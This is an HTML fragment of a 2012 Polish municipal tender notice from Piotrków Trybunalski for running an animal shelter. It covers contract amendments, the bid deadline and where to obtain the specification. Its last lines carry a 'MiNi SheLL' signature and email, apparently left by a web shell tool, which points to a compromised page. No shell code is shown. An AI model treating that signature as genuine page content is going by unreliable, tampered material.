<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa na realizację zamówienia zostanie zawarta na warunkach wymienionych 
w załączonym do SIWZ wzorze umowy.
Dopuszcza się zawarcie aneksów do umowy w wypadku:
Zmiany przepisów prawa związanych z prowadzeniem schroniska.
Uruchomienia hotelu dla zwierząt.
Nagłej i nieprzewidzianej zmiany warunków prowadzenia schroniska, powodującej niemożność zachowania postanowień zawartych w umowie.
Zmiany stawki podatku VAT w przypadku jej zmiany przez władzę ustawodawczą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Rudowskiego 10
97-300 Piotrków Trybunalski
pokój 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Rudowskiego 10
97-300 Piotrków Trybunalski
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com